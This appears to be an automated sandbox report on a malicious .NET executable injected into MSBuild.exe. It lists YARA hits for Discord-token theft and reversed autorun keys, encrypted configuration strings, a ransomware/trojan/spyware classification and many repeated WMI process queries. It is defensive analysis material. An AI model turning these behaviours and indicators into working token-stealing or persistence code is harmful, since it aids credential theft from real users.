Source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: Kh7W85ONS7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, Settings.cs	Base64 encoded string: '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
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, Settings.cs	Base64 encoded string: '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

Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@19/140@6/6

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Kh7W85ONS7.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1296:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Temp\tmpD17D.tmp

Jump to behavior

Source: Kh7W85ONS7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Kh7W85ONS7.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
